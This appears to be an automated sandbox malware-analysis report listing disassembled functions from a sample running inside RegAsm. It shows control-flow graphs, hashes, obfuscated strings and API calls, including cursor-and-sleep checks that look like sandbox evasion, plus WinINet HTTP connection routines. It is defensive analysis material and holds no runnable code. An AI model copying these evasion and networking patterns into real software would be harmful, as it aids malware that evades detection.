                                                                                                                                                                                                                                            • String ID: n{
                                                                                                                                                                                                                                            • API String ID: 3597693367-2104556642
                                                                                                                                                                                                                                            • Opcode ID: fc4b3d48a0e8540657a869ce82f5b0197dc0f5a76b0b9dd1f948638ca3d1c01e
                                                                                                                                                                                                                                            • Instruction ID: 44c97013f5b65640722b1e4ba322d050673a7c89aed965f0a1b77def22a273ce
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc4b3d48a0e8540657a869ce82f5b0197dc0f5a76b0b9dd1f948638ca3d1c01e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66A18471E002189FEB24CFA8DC81B9EBBB6FB88714F118169E508B7385D7786D418F94
                                                                                                                                                                                                                                            Function 00432300 Relevance: 9.3, APIs: 6, Instructions: 343sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 6393 432300-432313 GetCursorPos 6394 432319-432320 6393->6394 6395 432326-432339 GetCursorPos 6394->6395 6396 4327bd 6394->6396 6398 4325ff-432630 GetPEB 6395->6398 6399 43233f-432348 6395->6399 6397 4327bf-4327c5 6396->6397 6400 432633-432682 6398->6400 6399->6398 6401 43234e-432376 GetPEB 6399->6401 6403 432684-43268b 6400->6403 6404 43268d 6400->6404 6402 432379-4323c8 6401->6402 6405 4323d3 6402->6405 6406 4323ca-4323d1 6402->6406 6407 432694-43269a 6403->6407 6404->6407 6408 4323da-4323e0 6405->6408 6406->6408 6409 4326a0-4326a6 6407->6409 6410 43277a-432795 6407->6410 6412 4323e6-4323ec 6408->6412 6413 4324b4-4324c9 6408->6413 6414 4326a9-4326c2 6409->6414 6410->6400 6411 43279b 6410->6411 6415 4327a2-4327b8 Sleep 6411->6415 6416 4323ef-432402 6412->6416 6413->6402 6418 4324cf 6413->6418 6414->6410 6417 4326c8-4326e9 6414->6417 6415->6394 6416->6413 6419 432408-432423 6416->6419 6420 4326f0-43270d 6417->6420 6421 4324d6-4324f9 Sleep GetCursorPos 6418->6421 6423 43242a-432447 6419->6423 6424 43271a-43272b 6420->6424 6425 43270f-432737 6420->6425 6421->6398 6422 4324ff-432508 6421->6422 6422->6398 6426 43250e-4325fa call 566450 * 2 call 41fb00 call 566450 * 3 call 566330 call 41fbd0 6422->6426 6427 432454-432465 6423->6427 6428 432449-432471 6423->6428 6424->6420 6432 432775 6425->6432 6433 432739-432773 6425->6433 6426->6397 6427->6423 6435 432473-4324ad 6428->6435 6436 4324af 6428->6436 6432->6414 6433->6415 6435->6421 6436->6416
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Cursor$Sleep$__aulldiv
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1481957275-0
                                                                                                                                                                                                                                            • Opcode ID: d2eee400279e9d957e3da22267a717102f1fee945c863c47cfce2d3cd15cc7e2
                                                                                                                                                                                                                                            • Instruction ID: 375cfc09b03ecb9e91bc55ebd2385ec7a2d6df576953a530d1ac96b91999e4a1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2eee400279e9d957e3da22267a717102f1fee945c863c47cfce2d3cd15cc7e2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4F1D774E04219DFDB14CF98C990BAEBBB2FF88304F14819AD819A7345D778AA81CF55
                                                                                                                                                                                                                                            Function 0050BE90 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 135memorystringCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 6559 50be90-50bed6 call 50b840 call 50b800 6564 50bee2-50bf06 call 41b910 6559->6564 6565 50bed8-50bedd 6559->6565 6569 50bf09-50bf19 6564->6569 6566 50c047-50c04a 6565->6566 6569->6569 6570 50bf1b-50bf42 call 41a1e0 6569->6570 6573 50bf70-50bf75 call 41bb40 6570->6573 6574 50bf44-50bf48 6570->6574 6579 50bf7a-50bf7e 6573->6579 6576 50bf53 6574->6576 6577 50bf4a-50bf51 6574->6577 6578 50bf5a-50bf60 6576->6578 6577->6578 6578->6573 6580 50bf62-50bf6e call 414e70 6578->6580 6581 50bf80-50bf87 6579->6581 6582 50bf89 6579->6582 6580->6579 6584 50bf90-50bf96 6581->6584 6582->6584 6586 50bf98-50bfaf call 4ee3c0 6584->6586 6587 50bfde-50bfea call 417140 6584->6587 6594 50bfb2-50bfc2 6586->6594 6592 50bfec-50bffc lstrlenA 6587->6592 6593 50bffe-50c007 6587->6593 6595 50c00a-50c045 GetProcessHeap HeapAlloc lstrcpynA 6592->6595 6593->6595 6594->6594 6596 50bfc4-50bfd9 call 4172e0 6594->6596 6595->6566 6596->6587
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,aaj38,?), ref: 0050BFF0
                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000001,00000000,aaj38,?), ref: 0050C013
                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0050C01A
                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 0050C02F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Heap$AllocProcesslstrcpynlstrlen
                                                                                                                                                                                                                                            • String ID: 38a49$aaj38
                                                                                                                                                                                                                                            • API String ID: 2211197272-4103302207
                                                                                                                                                                                                                                            • Opcode ID: 9580dac5f390adca3b265e61287505e84e2aa1785abe6cfe9d852097683f59fd
                                                                                                                                                                                                                                            • Instruction ID: 5e0676a8408f78954a8867b468c635290f1cf33cd0337551ccb9147b7de26194
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9580dac5f390adca3b265e61287505e84e2aa1785abe6cfe9d852097683f59fd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D51FFB0D04249AFEF04DFA8D899BEEBFB1BF48304F10805AE515AB281D7755A85CF94
                                                                                                                                                                                                                                            Function 00433CF0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 170COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: AU.$Content-Type: application/x-www-form-urlencoded$n{
                                                                                                                                                                                                                                            • API String ID: 3732870572-2762896062
                                                                                                                                                                                                                                            • Opcode ID: 564a9c53bc46c4c409a778d4edc3634a30f7ad9adbc17df131e0649f8af0ce7a
                                                                                                                                                                                                                                            • Instruction ID: 669cdcbc90d8bd02f8a37ada013642480785e7ccf461275370d6c2e67f3ef742
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 564a9c53bc46c4c409a778d4edc3634a30f7ad9adbc17df131e0649f8af0ce7a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E612EB1E00208ABDB14DFA9DC55BEEBBB5FF88304F508119E509BB380DB786945CB95
                                                                                                                                                                                                                                            Function 004263E0 Relevance: 7.2, APIs: 2, Strings: 1, Instructions: 1923libraryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00423900: __aulldiv.LIBCMT ref: 00423C96
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004281FA
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042839F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$__aulldiv
                                                                                                                                                                                                                                            • String ID: 0c\UU@
                                                                                                                                                                                                                                            • API String ID: 898380398-831922003
                                                                                                                                                                                                                                            • Opcode ID: 3b979697a2a28dc4638233d70ca8ea3be594a0fc403fc6354966161bc91f2c7b
                                                                                                                                                                                                                                            • Instruction ID: 5815af0ce324c93d44586b93ce555d085c74b246f2de5e0bfc69a2d9b84e3f3c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b979697a2a28dc4638233d70ca8ea3be594a0fc403fc6354966161bc91f2c7b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB231870E052688FCB25CF68DC90BEEBBB1BF4A308F1481DAD449A7342D6356A85DF54
                                                                                                                                                                                                                                            Function 0050BBB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 218networkCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0050B890: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050B8E4
                                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000002,00000000,00000000,80000000,00000000), ref: 0050BCC3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InternetOpen
                                                                                                                                                                                                                                            • String ID: {
                                                                                                                                                                                                                                            • API String ID: 2038078732-366298937
                                                                                                                                                                                                                                            • Opcode ID: a50ecd5835876eb8dd4a800f883d32f1f3cc1d675fc045545af166e7928cc127
                                                                                                                                                                                                                                            • Instruction ID: 303ff10650ca6c4884a928bc1d4f83d84d075c7b5ef5698bfc1688b859a78c2b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a50ecd5835876eb8dd4a800f883d32f1f3cc1d675fc045545af166e7928cc127
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AA1F1B5D00209DFEB14DF98C895BEEBBB5BF48304F248159E905AB281D774AA45CFA0
                                                                                                                                                                                                                                            Function 0051BD80 Relevance: 4.6, APIs: 3, Instructions: 140COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 0051BE0E
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0051BE4F
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,00000000,00000001,00000028,?,00000000,00000001,00000008), ref: 0051BEF4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$HandleModule
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1090667551-0
                                                                                                                                                                                                                                            • Opcode ID: ab7339f71b8fd24bb1daaef78b96bdccfb41147339b43e99d32d35df6a0c16a1
                                                                                                                                                                                                                                            • Instruction ID: fe9c51b8f3508887e9fe5af8ccbade2a034f56e57b751b4b205892e94710cfb6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab7339f71b8fd24bb1daaef78b96bdccfb41147339b43e99d32d35df6a0c16a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D051D1B5E08288ABEF04DBF98C55AEFBFF56F5C200F0484ADF555E3282E63446048B60
                                                                                                                                                                                                                                            Function 0051C020 Relevance: 3.2, APIs: 2, Instructions: 150COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(000005B6), ref: 0051C0CF
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 0051C1AE
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F
                                                                                                                                                                                                                                              • Part of subcall function 0051BD80: GetModuleHandleA.KERNEL32(00000000), ref: 0051BE0E
                                                                                                                                                                                                                                              • Part of subcall function 0051BD80: GetLastError.KERNEL32 ref: 0051BE4F
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireErrorHandleLastModuleRelease$ConditionVariableWake
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1192564941-0
                                                                                                                                                                                                                                            • Opcode ID: a273376bf9418daafef374fe275ad86f533da78d0465f811e7bf7bf49d955769
                                                                                                                                                                                                                                            • Instruction ID: 69a9a7caf1b3a47ec4176bf7c1269fc47c7bd7e0e76803d0bab5eea4d85b5a08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a273376bf9418daafef374fe275ad86f533da78d0465f811e7bf7bf49d955769
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E451C3B1D04249AFDB14DBF89845AEEBFB5BB98300F04456AF555A3282EA345A048BA1
                                                                                                                                                                                                                                            Function 0053E01E Relevance: 1.7, APIs: 1, Instructions: 185COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0053E659
                                                                                                                                                                                                                                              • Part of subcall function 00540B81: RaiseException.KERNEL32(E06D7363,00000001,00000003,BS,?,?,?,?,0053E642,?,00588EB8), ref: 00540BE1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFeaturePresentProcessorRaise
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1477838251-0
                                                                                                                                                                                                                                            • Opcode ID: cda199d53502993a2710c5678e1d9b98c84bcbcd67dc311b76dea8504dea9ae5
                                                                                                                                                                                                                                            • Instruction ID: 14de0478b3319b42f1111524a07ecd127b8ee99bbc73f54541f9c991690e3b7d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cda199d53502993a2710c5678e1d9b98c84bcbcd67dc311b76dea8504dea9ae5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A619071D012199BEB14CFA5DC8A7AEBBF4FB54310F24842AD805E7291E3B4AD48DB90
                                                                                                                                                                                                                                            Function 0050B890 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 255networkCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 6257 50b890-50b8ee InternetOpenA 6258 50b8f0-50b8f5 6257->6258 6259 50b8fa-50b942 InternetConnectA 6257->6259 6260 50bb9d-50bba3 6258->6260 6262 50b944-50b964 6259->6262 6263 50b967-50b999 6259->6263 6262->6263 6264 50b9a4-50b9a8 6263->6264 6265 50b9d5-50ba28 HttpOpenRequestA 6264->6265 6266 50b9aa-50b9d3 6264->6266 6269 50bb28-50bb50 6265->6269 6270 50ba2e-50bacb GetLastError call 566450 * 3 call 566330 call 50b730 6265->6270 6266->6264 6275 50bb52 6269->6275 6276 50bb59-50bb5d 6269->6276 6270->6269 6290 50bacd-50bad3 6270->6290 6275->6276 6278 50bb6f-50bb73 6276->6278 6279 50bb5f-50bb6c InternetCloseHandle 6276->6279 6281 50bb85-50bb89 6278->6281 6282 50bb75-50bb81 6278->6282 6279->6278 6283 50bb9a 6281->6283 6284 50bb8b-50bb96 6281->6284 6282->6281 6283->6260 6284->6283 6290->6269 6291 50bad5-50badb 6290->6291 6291->6269 6292 50badd-50bb24 6291->6292 6292->6269
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050B8E4
                                                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,0000EFD2,00000050,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0050B92F
                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0050BA08
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InternetOpen$ConnectHttpRequest
                                                                                                                                                                                                                                            • String ID: 6~swr
                                                                                                                                                                                                                                            • API String ID: 3864186401-3949020348
                                                                                                                                                                                                                                            • Opcode ID: 663b295ad1e004887a0d64917906e1e8d2841d4388c1b4ab8657af88b613dfc7
                                                                                                                                                                                                                                            • Instruction ID: dfeebe113d482a7fc0d3fabec27dd4a5e230ccde294820cd5b2b94538c26df42
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 663b295ad1e004887a0d64917906e1e8d2841d4388c1b4ab8657af88b613dfc7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7B1F7B4E00208EBEB14CF95DC95BEEBBB5BF48704F108159E605BB280D7B9AA05DF54
                                                                                                                                                                                                                                            Function 00431A40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 206COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 6294 431a40-431b40 call 566450 call 566330 call 41b910 6301 431b43-431b53 6294->6301 6301->6301 6302 431b55-431b7f call 41a1e0 6301->6302 6305 431b81-431b88 6302->6305 6306 431bb6-431bbe call 41bb40 6302->6306 6308 431b93 6305->6308 6309 431b8a-431b91 6305->6309 6311 431bc3-431bca 6306->6311 6310 431b9a-431ba0 6308->6310 6309->6310 6310->6306 6312 431ba2-431bb4 call 414e70 6310->6312 6313 431bd5 6311->6313 6314 431bcc-431bd3 6311->6314 6312->6311 6316 431bdc-431be2 6313->6316 6314->6316 6318 431c30-431c57 call 417140 6316->6318 6319 431be4-431bfe call 4ee3c0 6316->6319 6324 431c62-431c66 6318->6324 6325 431c01-431c11 6319->6325 6326 431c93-431cd0 call 414d00 call 54e93c 6324->6326 6327 431c68-431c91 6324->6327 6325->6325 6328 431c13-431c2b call 4172e0 6325->6328 6335 431cd2-431ce6 call 54edcb call 54e81e 6326->6335 6336 431cfd-431d12 call 417140 6326->6336 6327->6324 6328->6318 6342 431ceb-431cfa call 54ea78 6335->6342 6342->6336
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: eks$j3l6lrek$m$n{$}$}{
                                                                                                                                                                                                                                            • API String ID: 3732870572-2155061626
                                                                                                                                                                                                                                            • Opcode ID: 570fdce1bff2163f546b2d44297705b8fce1b708f348b16e0cca711fddc8519b
                                                                                                                                                                                                                                            • Instruction ID: 43188a1591aad1c34db43096a5003d9be3fc9e5e01c1351a24c8dc1fba59194c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 570fdce1bff2163f546b2d44297705b8fce1b708f348b16e0cca711fddc8519b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83A103B0D042589FDF14CFA5C891BEEBBB1BF48304F1481AAD409AB341DB786A85CF95
                                                                                                                                                                                                                                            Function 00557682 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 6451 557682-557692 6452 557694-5576a7 call 54e10e call 54e121 6451->6452 6453 5576ac-5576ae 6451->6453 6469 557a06 6452->6469 6455 5576b4-5576ba 6453->6455 6456 5579ee-5579fb call 54e10e call 54e121 6453->6456 6455->6456 6459 5576c0-5576e9 6455->6459 6474 557a01 call 55303c 6456->6474 6459->6456 6462 5576ef-5576f8 6459->6462 6465 557712-557714 6462->6465 6466 5576fa-55770d call 54e10e call 54e121 6462->6466 6467 5579ea-5579ec 6465->6467 6468 55771a-55771e 6465->6468 6466->6474 6473 557a09-557a0c 6467->6473 6468->6467 6472 557724-557728 6468->6472 6469->6473 6472->6466 6476 55772a-557741 6472->6476 6474->6469 6479 557776-55777c 6476->6479 6480 557743-557746 6476->6480 6484 557750-557767 call 54e10e call 54e121 call 55303c 6479->6484 6485 55777e-557785 6479->6485 6482 55776c-557774 6480->6482 6483 557748-55774e 6480->6483 6487 5577e9-557808 6482->6487 6483->6482 6483->6484 6516 557921 6484->6516 6488 557787 6485->6488 6489 557789-5577a7 call 55a608 call 55a5ce * 2 6485->6489 6490 5578c4-5578cd call 5612fd 6487->6490 6491 55780e-55781a 6487->6491 6488->6489 6520 5577c4-5577e7 call 54af49 6489->6520 6521 5577a9-5577bf call 54e121 call 54e10e 6489->6521 6505 5578cf-5578e1 6490->6505 6506 55793e 6490->6506 6491->6490 6494 557820-557822 6491->6494 6494->6490 6498 557828-557849 6494->6498 6498->6490 6502 55784b-557861 6498->6502 6502->6490 6507 557863-557865 6502->6507 6505->6506 6511 5578e3-5578f2 GetConsoleMode 6505->6511 6509 557942-557958 ReadFile 6506->6509 6507->6490 6512 557867-55788a 6507->6512 6514 5579b6-5579c1 GetLastError 6509->6514 6515 55795a-557960 6509->6515 6511->6506 6517 5578f4-5578f8 6511->6517 6512->6490 6519 55788c-5578a2 6512->6519 6522 5579c3-5579d5 call 54e121 call 54e10e 6514->6522 6523 5579da-5579dd 6514->6523 6515->6514 6524 557962 6515->6524 6518 557924-55792e call 55a5ce 6516->6518 6517->6509 6525 5578fa-557912 ReadConsoleW 6517->6525 6518->6473 6519->6490 6531 5578a4-5578a6 6519->6531 6520->6487 6521->6516 6522->6516 6528 5579e3-5579e5 6523->6528 6529 55791a-557920 call 54e0c7 6523->6529 6535 557965-557977 6524->6535 6526 557914 GetLastError 6525->6526 6527 557933-55793c 6525->6527 6526->6529 6527->6535 6528->6518 6529->6516 6531->6490 6538 5578a8-5578bf 6531->6538 6535->6518 6542 557979-55797d 6535->6542 6538->6490 6546 557996-5579a3 6542->6546 6547 55797f-55798f call 557394 6542->6547 6549 5579a5 call 5574eb 6546->6549 6550 5579af-5579b4 call 5571da 6546->6550 6556 557992-557994 6547->6556 6557 5579aa-5579ad 6549->6557 6550->6557 6556->6518 6557->6556
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ea39bd72b4469cb3e6f5953d31d5c595cd9ad22dc9afcdde99cbbff7fb928db5
                                                                                                                                                                                                                                            • Instruction ID: 7d99da20ef12af29ccd29c4ddb17e5e6c5c7c828da3b2614929e8c5234eecdb2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea39bd72b4469cb3e6f5953d31d5c595cd9ad22dc9afcdde99cbbff7fb928db5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58B11374A0824A9BDF11DFA8EC65BAD7FB0BF4D301F24015AEC45AB292C7709949CB60
                                                                                                                                                                                                                                            Function 00431D20 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431A40: __aulldiv.LIBCMT ref: 00431AFC
                                                                                                                                                                                                                                              • Part of subcall function 00416D40: std::ios_base::clear.LIBCPMTD ref: 00416E67
                                                                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00431DD6
                                                                                                                                                                                                                                              • Part of subcall function 004141F0: std::ios_base::clear.LIBCPMTD ref: 00414372
                                                                                                                                                                                                                                              • Part of subcall function 00414120: std::ios_base::clear.LIBCPMTD ref: 0041417E
                                                                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00431EC1
                                                                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00431EF2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Ios_base_dtorstd::ios_base::_std::ios_base::clear$__aulldiv
                                                                                                                                                                                                                                            • String ID: `XA$`@
                                                                                                                                                                                                                                            • API String ID: 3845869555-3161672447
                                                                                                                                                                                                                                            • Opcode ID: a60a9ab66fea74c40637482695fa9900cea410be327952e2ab23aa4d3da5d38c
